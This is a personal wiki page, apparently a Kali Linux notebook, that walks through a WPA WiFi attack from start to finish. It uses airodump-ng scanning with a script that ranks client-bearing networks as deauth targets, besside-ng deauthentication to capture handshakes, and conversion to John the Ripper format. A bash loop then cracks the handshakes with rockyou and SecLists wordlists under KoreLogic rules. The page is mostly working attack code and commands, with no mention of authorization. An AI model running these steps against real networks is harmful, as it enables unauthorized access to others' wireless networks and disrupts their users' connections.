Kali/Wireless Reboot
From charlesreid1
Reboot
Revisiting some of the old techniques.
Monitor wireless
First is the aircrack-ng suite to monitor wifi networks.
Start by putting the wifi card in monitor mode (wlan1 here; substitute your own interface, and stop any network manager that would flip it back to managed mode, which is what airmon-ng's check kill does):
$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up
Now you can use that interface to scan for wireless network activity, writing everything it sees to files named after the prefix (output_file-01.cap, output_file-01.csv, and so on):
$ airodump-ng -w output_file wlan1
The interface is the final, positional argument. Don't pass it with -i: in airodump-ng that is the short form of --ivs, which keeps only the WEP initialization vectors and discards the frames a WPA handshake needs.
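As an added example (not code from the original page), here is a small bash script that turns the output_file-01.csv written by airodump-ng -w into a target list: one line per access point with its channel, encryption, ESSID and the number of associated stations seen, busiest first. Access points with clients are the ones a deauth can coax a WPA handshake out of, so the wpa_targets helper filters down to those. The CSV that write_sample_csv embeds is constructed for the demonstration; the column layout (access-point block with BSSID, channel in column 4, privacy in column 6, ESSID in column 14; station block whose column 6 is the associated BSSID) is airodump-ng's, and the script assumes no ESSID contains a comma, since airodump does not quote that field.

```shell
#!/bin/bash
# Summarise an airodump-ng CSV (the <prefix>-01.csv written by -w) into a
# target list: one access point per line, most associated clients first.
# Assumes no ESSID contains a comma (airodump does not quote the field).

airodump_targets() {
    awk -F',' '
        function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
        /^BSSID,/       { section = "ap";  next }   # first block: access points
        /^Station MAC,/ { section = "sta"; next }   # second block: stations
        /^[ \t]*$/      { next }
        section == "ap" {
            b = trim($1)
            chan[b] = trim($4); priv[b] = trim($6); essid[b] = trim($14)
            clients[b] += 0
        }
        section == "sta" {
            ap = trim($6)                  # "(not associated)" for probing-only stations
            if (ap in chan) clients[ap]++
        }
        END {
            for (b in clients)
                printf "%d %s %s %s %s\n", clients[b], b, chan[b], priv[b], essid[b]
        }
    ' "$1" | sort -k1,1nr -k2,2
}

# Only WPA/WPA2 networks that have at least one client: the ones a deauth
# can produce a 4-way handshake from.
wpa_targets() {
    airodump_targets "$1" | awk '$1 > 0 && $4 ~ /WPA/'
}

# Constructed sample in airodump-ng's CSV layout, for running this offline.
write_sample_csv() {
    cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2014-07-05 10:00:01, 2014-07-05 10:05:12,  6,  54, WPA2, CCMP, PSK, -41,      120,        3,   0.  0.  0.  0,   7, HomeNet, 
66:77:88:99:AA:BB, 2014-07-05 10:00:03, 2014-07-05 10:05:10, 11,  54, OPN ,     ,    , -70,       80,        0,   0.  0.  0.  0,  10, CoffeeShop, 
CC:DD:EE:FF:00:11, 2014-07-05 10:00:05, 2014-07-05 10:04:59,  1,  11, WEP , WEP ,    , -63,       60,      512,   0.  0.  0.  0,   5, OldAP, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:AA:AA:AA:AA:01, 2014-07-05 10:00:10, 2014-07-05 10:05:00, -50,      200, 00:11:22:33:44:55, HomeNet
AA:AA:AA:AA:AA:02, 2014-07-05 10:01:10, 2014-07-05 10:05:05, -55,       40, 00:11:22:33:44:55, 
AA:AA:AA:AA:AA:03, 2014-07-05 10:02:10, 2014-07-05 10:04:40, -60,       10, (not associated) , CoffeeShop,HomeNet
AA:AA:AA:AA:AA:04, 2014-07-05 10:02:30, 2014-07-05 10:04:45, -58,       25, CC:DD:EE:FF:00:11, 

EOF
}

# Usage: airodump_targets.sh <prefix>-01.csv; with no argument, run the sample.
if [ -n "${1:-}" ]; then
    wpa_targets "$1"
else
    sample=$(mktemp)
    write_sample_csv "$sample"
    airodump_targets "$sample"
    rm -f "$sample"
fi
```

Run on the sample, HomeNet (WPA2, two clients) sorts to the top and is the only line wpa_targets keeps; the open network and the client-less WEP one drop out. Stations listed as "(not associated)" only probe for networks and are not counted, since they cannot be deauthenticated from an access point they are not attached to.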
Obtain handshakes
Next is besside-ng to obtain handshakes: it deauthenticates clients on the WPA networks it sees, captures the resulting 4-way handshakes and writes them to wpa.cap in the directory it is run from (its -W option restricts it to WPA networks and skips the WEP cracking). Here it was run from /root/box/08_besside, which is where the cracking script below looks for the results.
Crack handshakes
Once we have the handshakes, use the instructions on the John the Ripper/WPA page to turn the cap file into an hccap file, then into a John the Ripper password file:
$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw
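An added check, not from the original page: if wpa.cap holds no complete handshake, nothing useful comes out of the conversion and john will have nothing to crack, so it pays to inspect wpa.hccap before queueing hours of wordlists. The hccap format is a fixed 392-byte record (36-byte NUL-padded ESSID, AP MAC, client MAC, two 32-byte nonces, a 256-byte EAPOL frame, its length, the key version, and a 16-byte MIC), so a size check plus a dump of each record's ESSID, AP MAC and key version (1 = WPA/TKIP, 2 = WPA2/CCMP) confirms what the converter produced. The record that write_sample_hccap writes is constructed (zeros apart from the fields shown), the function names are mine, and reading the key version with od assumes a little-endian host, which is what wrote the file in the first place.

```shell
#!/bin/bash
# Sanity-check an hccap file before handing it to hccap2john/john.
# hccap is a fixed 392-byte record (offsets in bytes):
#   0   essid[36]   NUL-padded
#   36  mac1[6]     access point
#   42  mac2[6]     client
#   48  nonce1[32], 80 nonce2[32], 112 eapol[256], 368 eapol_size (int)
#   372 keyver (int; 1 = WPA/TKIP, 2 = WPA2/CCMP)
#   376 keymic[16]
HCCAP_REC=392

hccap_summary() {
    local f="$1" size n i off essid ap keyver
    size=$(wc -c < "$f" | tr -d ' ')
    if [ "$size" -eq 0 ] || [ $((size % HCCAP_REC)) -ne 0 ]; then
        echo "error: $f is $size bytes, not a multiple of $HCCAP_REC: no usable handshake" >&2
        return 1
    fi
    n=$((size / HCCAP_REC))
    i=0
    while [ "$i" -lt "$n" ]; do
        off=$((i * HCCAP_REC))
        # ESSID: first 36 bytes, strip the NUL padding
        essid=$(dd if="$f" bs=1 skip="$off" count=36 2>/dev/null | tr -d '\000')
        # AP MAC: six raw bytes at offset 36, printed as colon-separated hex
        ap=$(od -An -t x1 -j $((off + 36)) -N 6 "$f" | awk '{ printf "%s:%s:%s:%s:%s:%s", $1,$2,$3,$4,$5,$6 }')
        # key version: native-endian int at offset 372
        keyver=$(od -An -t u4 -j $((off + 372)) -N 4 "$f" | awk '{ print $1 }')
        echo "$essid ap=$ap keyver=$keyver"
        i=$((i + 1))
    done
}

# Constructed single-record sample: ESSID "HomeNet", AP 00:11:22:33:44:55,
# key version 2, every other field zero.
write_sample_hccap() {
    {
        printf 'HomeNet'; head -c 29 /dev/zero                 # essid, padded to 36
        head -c 1 /dev/zero; printf '\021\042\063\104\125'     # mac1 = 00:11:22:33:44:55
        head -c 330 /dev/zero                                  # mac2 .. eapol_size
        printf '\002'; head -c 3 /dev/zero                     # keyver = 2 (little-endian)
        head -c 16 /dev/zero                                   # keymic
    } > "$1"
}

# Usage: hccap_check.sh wpa.hccap; with no argument, run on the sample.
if [ -n "${1:-}" ]; then
    hccap_summary "$1"
else
    sample=$(mktemp)
    write_sample_hccap "$sample"
    hccap_summary "$sample"
    rm -f "$sample"
fi
```

A file whose size is not a multiple of 392 (an empty file included) fails the check with a non-zero exit, which is the case to catch: besside-ng logged the network but never saw all four messages of the handshake, and the fix is to go back and capture again rather than to start cracking.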
Now the goal is to crack booty.johnpw with John the Ripper. WPA-PSK is slow to attack (every candidate passphrase costs 4096 rounds of PBKDF2-HMAC-SHA1), so the order matters: run the small, targeted wordlists before rockyou, and only turn on rulesets once the plain lists are exhausted. John records cracked keys in its pot file and skips them on later runs, so the script can be stopped and restarted with a different ruleset at any point, and john --show --format=wpapsk booty.johnpw prints whatever has been recovered so far. To drive the combinations of wordlists and rulesets, use a bash script:
#!/bin/bash
# Loop John the Ripper over every converted handshake file, trying each
# wordlist under each ruleset. Arrays and the "==" test below need bash,
# not /bin/sh.
#
# seclist passwords located in
# ~/codes/SecLists/Passwords
johndir="/usr/sbin"
johnbin="${johndir}/john"
pwdir="/root/box/08_besside"

# Round 0: plain wordlists, no rules
rulesets=("")
#### Round 1
###rulesets=("KoreLogicRulesAppendYears")
#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords, smallest first:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt
wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work
# Glob directly instead of parsing ls; bail out if nothing matched.
for pwfile in "${pwdir}"/*.johnpw; do
    [ -e "${pwfile}" ] || { echo "no .johnpw files in ${pwdir}"; exit 1; }
    echo ""
    echo "*** * * ** **** * ***** ** ** * * * ** ****"
    echo "Now on password file ${pwfile}"
    echo ""
    for rules in "${rulesets[@]}"; do
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . . ."
        echo "Now on ruleset ${rules:-(none)}"
        echo ""
        for wordlist in "${wordlists[@]}"; do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules:-(none)}"
            echo "Password File: ${pwfile}"
            # john is run from its own directory, as in the original; the
            # subshell means there is no need to cd back afterwards.
            if [ "${rules}" == "" ]; then
                # print the command, then run it
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"
                ( cd "${johndir}" && "${johnbin}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}" )
            else
                echo "${johnbin} --rules=${rules} --wordlist=${wordlist} --format=wpapsk ${pwfile}"
                ( cd "${johndir}" && "${johnbin}" --rules="${rules}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}" )
            fi
        done
    done
done
Flags
Wireless: all things wireless.
Software: aircrack-ng, a suite of tools for wireless cracking.
aircrack-ng pages: Many Ways to Crack a Wifi (Cracking Wifi), Aircrack Benchmarking (Aircrack/Benchmarking), WEP Attacks with Aircrack (Aircrack/WEP Cracking), WPA Attacks with Aircrack (Aircrack/WPA Cracking), Aircrack Hardware (Aircrack/Packet Injection Testing), Harvesting Wireless Network Information
airodump-ng: Basic Usage of Airodump
Category:Security · Category:Wireless · Category:Passwords